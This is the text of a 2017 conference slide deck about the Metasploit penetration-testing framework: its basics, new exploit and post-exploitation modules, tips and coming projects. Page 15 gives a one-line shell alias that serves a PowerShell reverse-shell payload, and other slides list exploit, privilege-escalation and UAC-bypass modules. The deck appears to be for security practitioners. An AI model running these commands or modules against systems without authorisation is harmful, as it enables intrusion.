Metasploit Community - SecTor 2017 · PDF fileThe Agenda Intro to Metasploit What’s New...

Metasploit Community: Tips, Tricks and What’s New At SecTor 2017


Page 1:

Metasploit Community: Tips, Tricks and What’s New

At SecTor 2017

Page 2:

Who am I?

GitHub: jmartin-r7
Twitter: @Op3n4M3

Jeffrey Martin

Senior Software Developer @ Rapid7

Page 3:

The Metasploit Community

Page 4:

The Agenda

● Intro to Metasploit
● What’s New in Metasploit
● Quick tips and hints
● What’s on the Horizon
● Question?

Page 5:

The Basics

msfvenom
Meterpreter/Shell
Bind/Reverse

Msfconsole
Modules
Exploit/Post/Aux
Handler

Page 6:

Innovating with Metasploit

Page 7:

Modules

multi/http/struts2_rest_xstream
multi/http/struts2_content_type_ognl
exploits/linux/samba/is_known_pipename
exploits/windows/smb/ms17_010_eternalblue
post/windows/gather/credentials/dynazip_log

Page 8:

Named Pipes

Page 9:

Railgun

Page 10:

Packet Encryption

Page 11:

Aggregator

Alice’s Console

Bob’s Console

Shells

Page 12:

External Module

Console

JSON RPC

Proxy

SOCKS 5

MSF-RPC

Session

Project Cold Stone

Page 13:

vm-automation

metasploit-baseline-builder

metasploitable3

Page 14:
Page 15:

You use it, have you done this?

Getting up there quickly:
alias powershell='msfconsole -qx "use exploit/multi/script/web_delivery; set target 2; set payload windows/powershell_reverse_tcp; set LHOST eth0; exploit"'

When it works:
post/windows/gather/enum_patches
post/multi/recon/local_exploit_suggester

Page 17:

You use it, have you done this?

When it doesn’t quite do it:
msf> edit

Page 18:

You use it, have you done this?

When you want more:
exploits/windows/local/ms16_032_secondary_logon_handle_privesc
exploits/windows/local/bypassuac_fodhelper.rb
exploits/windows/local/capcom_sys_exec.rb
exploits/windows/local/razer_zwopenprocess.rb

Page 19:

Project Goliath

Database

Database

Metasploit Console

Nmap, EyeWitness, etc.

Page 20:

RubySMB (SMB 1+2)

Page 21:

Questions?

● IRC
Server - irc.freenode.net
Channel - #metasploit

● Blog
blog.rapid7.com/tag/metasploit

[email protected]

● YouTube
https://www.youtube.com/c/MetasploitR7

● New Metasploit.com
● COMING SOON

Slack